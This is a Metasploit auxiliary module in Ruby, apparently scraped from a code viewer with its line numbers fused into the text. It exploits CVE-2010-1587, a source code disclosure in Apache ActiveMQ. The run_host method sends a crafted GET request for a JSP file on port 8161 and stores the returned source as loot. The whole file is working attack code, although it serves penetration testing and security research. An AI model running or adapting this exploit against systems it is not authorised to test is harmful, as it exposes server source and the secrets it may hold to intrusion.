Path: blob/master/modules/auxiliary/scanner/http/apache_activemq_source_disclosure.rb
19778 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient7include Msf::Auxiliary::Report8include Msf::Auxiliary::Scanner910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Apache ActiveMQ JSP Files Source Disclosure',15'Description' => %q{16This module exploits a source code disclosure in Apache ActiveMQ. The17vulnerability is due to the Jetty's ResourceHandler handling of specially crafted18URI's starting with //. It has been tested successfully on Apache ActiveMQ 5.3.119over Windows 2003 SP2 and Ubuntu 10.04.20},21'License' => MSF_LICENSE,22'Author' => [23'Veerendra G.G', # Vulnerability discovery24'juan vazquez' # Metasploit module25],26'References' => [27[ 'CVE', '2010-1587' ],28[ 'OSVDB', '64020' ],29[ 'BID', '39636' ],30[ 'URL', 'https://issues.apache.org/jira/browse/AMQ-2700' ]31],32'Notes' => {33'Reliability' => UNKNOWN_RELIABILITY,34'Stability' => UNKNOWN_STABILITY,35'SideEffects' => UNKNOWN_SIDE_EFFECTS36}37)38)3940register_options(41[42Opt::RPORT(8161),43OptString.new('TARGETURI', [true, 'Path to the JSP file to disclose source code', '/admin/index.jsp'])44]45)46end4748def run_host(ip)49print_status("#{rhost}:#{rport} - Sending request...")50uri = normalize_uri(target_uri.path)51res = send_request_cgi({52'uri' => uri,53'method' => 'GET',54})5556if res and res.code == 20057contents = res.body58fname = File.basename(datastore['TARGETURI'])59path = store_loot(60'apache.activemq',61'text/plain',62ip,63contents,64fname65)66print_status("#{rhost}:#{rport} - File saved in: #{path}")67else68print_error("#{rhost}:#{rport} - Failed to retrieve file")69return70end71end72end737475